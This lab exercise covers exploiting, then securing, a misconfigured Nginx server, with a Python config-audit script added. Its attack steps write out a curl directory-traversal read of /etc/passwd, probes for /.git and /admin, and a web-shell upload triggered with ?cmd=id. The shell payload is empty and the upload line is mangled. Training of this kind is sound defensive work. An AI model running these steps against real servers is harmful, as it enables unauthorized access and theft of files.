Exercise 31: Exploiting Misconfigured Nginx Web Server

by | Jun 7, 2025

Objective: Exploit misconfigurations in the Nginx web server to gain unauthorized access to sensitive data or escalate privileges, and learn how to secure Nginx configurations.


Scenario: Nginx is a popular web server used for serving websites and applications. Misconfigurations, such as directory traversal vulnerabilities or exposed sensitive files, can lead to unauthorized access or privilege escalation. Your task is to identify and exploit such vulnerabilities and secure the Nginx server.


Lab Setup

  1. Environment:
    • A Linux system running an Nginx web server with intentional misconfigurations.
  2. Tools Required:
    • nmap for scanning.
    • Nikto or a web browser for vulnerability enumeration.

Lab Steps

Step 1: Scan for Open Nginx Services

  1. Use nmap to identify open ports and services: nmap -p 80,443 --script=http-enum,http-vhosts <target_ip>
    • Replace <target_ip> with the IP address of the target system.
    • Example output:
        PORT    STATE SERVICE
        80/tcp  open  http
        443/tcp open  https
  2. Use Nikto to enumerate web server vulnerabilities: nikto -h http://<target_ip>
    • Look for exposed directories, configuration files, or vulnerabilities.

Step 2: Test for Directory Traversal

  1. Attempt to access sensitive files using directory traversal techniques: http://<target_ip>/../../etc/passwd
    • Replace <target_ip> with the target’s IP address.
  2. Use tools like curl to automate the process: curl http://<target_ip>/../../etc/passwd
    • Verify if sensitive file content (e.g., /etc/passwd) is exposed.

Step 3: Enumerate and Exploit Misconfigurations

  1. Identify accessible directories or files:
    • Common locations to check:
        http://<target_ip>/backup
        http://<target_ip>/admin
        http://<target_ip>/.git
  2. Exploit weakly configured root paths:
    • Look for symbolic links or misconfigured root or alias directives in the Nginx configuration.
    • Example misconfiguration in nginx.conf:
        location /static/ {
            alias /var/www/html/uploads/;
        }
    • Use this to access unintended files.
  3. If file upload is enabled, attempt to upload a malicious script:
        echo '<?php ?>' > shell.php
        curl -X POST -F '[email protected]' http://<target_ip>/upload
  4. Trigger the uploaded file: http://<target_ip>/uploads/shell.php?cmd=id

Step 4: Secure the Nginx Configuration

  1. Restrict access to sensitive directories in the Nginx configuration file (/etc/nginx/nginx.conf). The /\. alternative already covers every path segment that starts with a dot (including /.git and /.htaccess), so a separate \.. alternative is redundant:
        location ~ /(\.|backup|admin) {
            deny all;
        }
  2. Set proper file permissions:
        chmod -R 750 /var/www/html
        chown -R www-data:www-data /var/www/html
  3. Disable directory listing:
        location / {
            autoindex off;
        }
  4. Prevent access to sensitive files (the $ anchor keeps the rule from also matching names that merely contain these extensions, such as .config.js):
        location ~* \.(htaccess|htpasswd|config)$ {
            deny all;
        }
  5. Restart the Nginx service to apply changes: sudo systemctl restart nginx
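
As an added example that is not part of the original exercise, the following Python audit checks an nginx configuration fragment for the misconfiguration classes named in Step 3 (alias directives that let a request escape the aliased directory, directory listing, reachable dot-directories such as /.git) and confirms that Step 4 style hardening clears them. The two configuration fragments are constructed for this example; the alias check extends the page's example to the well-known case where a prefix location lacks a trailing slash while its alias has one.

```python
import re

# Constructed nginx.conf fragments (not from the original exercise): one carrying the
# misconfigurations the lab describes, one hardened along the lines of Step 4.
WEAK_CONF = r"""
server {
    root /var/www/html;
    autoindex on;
    location /static {
        alias /var/www/html/uploads/;
    }
}
"""

HARDENED_CONF = r"""
server {
    root /var/www/html;
    autoindex off;
    location /static/ {
        alias /var/www/html/uploads/;
    }
    location ~ /\. {
        deny all;
    }
}
"""

LOCATION_RE = re.compile(r'location\s+(?P<mod>[=~^*]*)\s*(?P<path>\S+)\s*\{')

def audit_nginx_conf(conf: str) -> list[str]:
    """Return findings for the misconfiguration classes covered in this exercise.
    Assumes location blocks are not nested, which holds for a server{} fragment."""
    findings = []
    if re.search(r'^\s*autoindex\s+on\s*;', conf, re.M):
        findings.append("autoindex on: directory listing is enabled")
    dotfiles_denied = False
    for m in LOCATION_RE.finditer(conf):
        body = conf[m.end():conf.find('}', m.end())]
        mod, path = m.group('mod'), m.group('path')
        alias = re.search(r'\balias\s+(\S+?)\s*;', body)
        # Prefix location without a trailing slash plus an alias: nginx rewrites
        # "/static../" to "/var/www/html/uploads/../", escaping the aliased directory.
        if alias and not mod and not path.endswith('/'):
            findings.append(f"location {path}: alias {alias.group(1)} without trailing "
                            f"slash allows {path}../ traversal")
        if mod.startswith('~') and path.startswith(r'/\.') and 'deny all' in body:
            dotfiles_denied = True
    if not dotfiles_denied:
        findings.append("no 'location ~ /\\.' deny rule: /.git, /.env etc. stay reachable")
    return findings
```

Run audit_nginx_conf on each fragment: the weak one yields three findings, the hardened one none.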

Testing and Verification

  1. Re-test for directory traversal vulnerabilities after applying mitigations.
  2. Verify that sensitive files and directories are no longer accessible.
  3. Ensure that unauthorized file uploads are blocked.

Reflection

This exercise demonstrates how misconfigurations in the Nginx web server can lead to unauthorized access or privilege escalation. By identifying and mitigating these vulnerabilities, you’ve gained valuable insights into securing web servers and their configurations.
